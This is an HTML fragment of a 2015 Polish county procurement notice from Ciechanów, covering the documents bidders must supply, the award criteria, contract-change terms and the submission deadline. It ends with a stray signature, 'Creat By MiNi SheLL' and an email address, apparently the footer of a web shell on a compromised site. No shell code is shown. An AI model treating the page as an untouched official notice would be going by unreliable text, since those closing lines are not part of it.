<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - długość gwarancji udzielona przez Wykonawcę w zakresie usuwania wad i usterek produktu określonego przez SIWZ - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia braku możliwości realizacji przedmiotu zamówienia w terminie określonym przez Zamawiającego w pkt. 6.1 SIWZ, spowodowane warunkami atmosferycznymi   Zamawiający dopuszcza możliwość ustalenia innego terminu realizacji zamówienia w uzgodnieniu z wybranym Wykonawcą</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://stciechanow.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Ciechanowie, ul. 17-go stycznia 7, 06-400 Ciechanów, I piętro, pok. 120..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2015 godzina 10:00, miejsce: Starostwo Powiatowe  w Ciechanowie, ul. 17 Stycznia 7, 06 - 400 Ciechanów, pokój nr 108, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com